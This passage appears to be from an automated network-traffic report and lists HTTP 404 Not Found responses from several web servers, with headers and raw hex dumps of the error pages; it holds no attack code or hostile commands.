Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:07:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Oct 2022 09:07:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:07:15 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 32 33 0d 0a 0a 0a 20 20 20 20 54 68 65 20 6c 69 6e 6b 20 6f 6e 20 74 68 65 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 38 30 0d 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 75 6c 65 6e 74 64 6f 6d 65 2e 75 6b 2f 68 63 66 75 2f 22 3e 72 65 66 65 72 72 69 6e 67 0a 20 20 20 20 70 61 67 65 3c 2f 61 3e 20 73 65 65 6d 73 20 74 6f 20 62 65 20 77 72 6f 6e 67 20 6f 72 20 6f 75 74 64 61 74 65 64 2e 20 50 6c 65 61 73 65 20 69 6e 66 6f 72 6d 20 74 68 65 20 61 75 74 68 6f 72 20 6f 66 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 0d 0a 34 37 0d 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 75 6c 65 6e 74 64 6f 6d 65 2e 75 6b 2f 68 63 66 75 2f 22 3e 74 68 61 74 20 70 61 67 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:07:17 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://malaya.live/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 24 Oct 2022 09:07:23 GMTserver: LiteSpeedx-frame-options: sameoriginstrict-transport-security: max-age=31536000Data Raw: 32 36 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 db 38 92 e0 e7 71 c4 fe 07 58 15 63 4b 6e 92 45 a9 9e a6 5a 9e 9b 7e c5 6d 44 cf ce c6 74 77 c4 ed d9 0e 07 44 42 12 db 14 c9 25 a1 7a 8c 5a ff 7d 23 33 01 12 7c 49 94 aa ec 9b 0f d7 1d d3 53 22 81 44 22 91 c8 17 32 c1 6f 5f fe f0 f7 ef 7f fd af ff fc 91 ad e4 3a 7a f7 6f 2f be 85 ff 67 11 8f 97 b3 81 88 ed df 7e 19 e0 43 c1 03 f8 ff b5 90 9c f9 2b 9e e5 42 ce 06 bf fd fa 93 7d 8b ef f1 79 cc d7 62 36 b8 0b c5 7d 9a 64 72 c0 fc 24 96 22 96 b3 c1 7d 18 c8 d5 2c 10 77 a1 2f 6c fc 61 b1 30 0e 65 c8 23 3b f7 79 24 66 63 84 12 85 f1 67 96 89 68 36 48 b3 64 11 46 62 c0 56 99 58 cc 06 2b 29 d3 dc 3b 3f 5f ae d3 a5 93 64 cb f3 87 45 7c 3e c6 4e ff f6 e2 5b 19 ca 48 bc fb 4f be 14 2c 4e 24 5b 24 9b 38 60 7f b0 bf f1 88 3f 72 f6 73 78 27 be 3d a7 36 6a 02 88 e8 eb 2c 99 27 32 7f 5d a0 f9 7a cd 1f ec 70 cd 97 c2 4e 33 01 d3 f0 22 9e 2d c5 6b 76 fe ee c5 b7 05 6e af 83 38 87 06 0b 21 fd d5 6b 42 f0 f5 f9 f9 1a 47 73 a2 f0 ae 67 87 dc b9 87 a9 f4 83 7e 1f 06 4b 21 73 e7 3e 75 fc 64 dd af 4f ee 1e d5 dc 75 96 19 bf e3 92 67 fd 87 18 9f d0 67 b2 af cf 80 47 52 64 31 97 62 c0 e4 63 2a 66 03 9e a6 51 e8 73 19 26 f1 79 96 e7 df 3c ac a3 01 c3 d5 9c 0d 8c 15 66 af 32 fe df 9b 64 ca 7e 12 22 a8 b3 8d b1 36 e7 0b 21 82 f3 41 75 49 9f 3e ea f7 c9 7a 2d 62 99 1f 1c de 57 0d 4d 3c 72 3f 0b 53 f9 ee c5 7d 18 07 c9 bd f3 e9 3e 15 eb e4 f7 f0 17 21 65 18 2f 73 36 63 db c1 9c e7 e2 b7 2c 1a 78 6a 2f 7c 38 ff 70 ae 38 e8 c3 39 32 6d fe e1 dc 4f 32 f1 e1 1c 3b 7f 38 1f 5f 3a ae e3 7e 38 bf 99 3c dc 4c 3e 9c 0f ac 81 78 90 03 6f e0 a4 f1 72 60 0d f2 bb e5 69 f0 f2 bb 25 42 cb ef 96 3f 12 c0 fc 0e 01 26 9b cc 17 03 6f 3b f0 93 d8 e7 12 d1 50 f8 7a 80 ae b1 0a 1f ce ef 53 3b 8c fd 68 13 88 fc c3 f9 ef 39 3e c0 1e 76 26 22 c1 73 e1 ac c3 d8 f9 3d ff cb 9d c8 66 d7 8e eb 5c 0c 76 bb e9 8b f3 37 2f d9 af ab 30 67 20 1d 58 98 33 be 91 89 bd 14 b1 c8 b8 14 01 7b 73 fe e2 e5 62 13 fb c0 2e 43 61 71 4b 8e b6 77 3c 63 b1 95 59 89 15 ce b8 e3 67 82 4b f1 63 24 60 bd 86 03 9f c7 77 3c 1f 8c ac 74 16 3a 4b 21 bf 07 99 f5 20 5f bd 32 7f 0d 07 93 60 30 9a 6a c0 2c 1f 0a 0d 98 cf 7e 91 59 18 2f 9d 45 96 ac bf 5f f1 ec fb 24 10 96 98 0d 53 c7 8f 04 cf fe 21 7c 39 74 2d d7 0a 1d 12 7c a1 b3 12 e1 72 25 47 56 ea 2c c2 28 fa 55 3c c8 21 77 80 cd 1f 87 72 15 e6 96 18 59 ae e5 8e ac d0 91 c9 0f 5c f2 df fe f1 f3 70 34 9a 66 42 6e b2 98 9d 0e 57 2a b8 62 36 9b 55 60 ef 8a 89 f9 43 41 f4 92 4d 4a 11 97 0e 46 53 e9 e4 99 3f 13 96 74 02 b1 10 d9 4c 3a b4 53 81 6e e7 bf Data Ascii: 260a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 24 Oct 2022 09:07:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 24 Oct 2022 09:07:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Oct 2022 09:07:47 GMTServer: ApacheContent-Length: 688Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 3a 34 30 30 2c 37 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 56 61 72 65 6c 61 2b 52 6f 75 6e 64 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 75 62 62 6c 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 70 3e 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 27 72 65 20 6c 6f 73 74 2e 2e 2e 3c 62 72 2f 3e 54 68 61 74 27 73 20 61 20 74 72 6f 75 62 6c 65 3f 3c 2f 70 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 47 6f 20 62 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>Error 404</title> <link href='https://fonts.googleapis.com/css?family=Nunito:400,700' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css?family=Varela+Round' rel='stylesheet' type='text/css'><link rel="stylesheet" href="/style.css"></head><body><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="bubble"></div><div class="main"> <h1>404</h1> <p>It looks like you're lost...<br/>That's a trouble?</p> <button type="button">Go back</button></div> <script src="/script.js"></script></body></html>
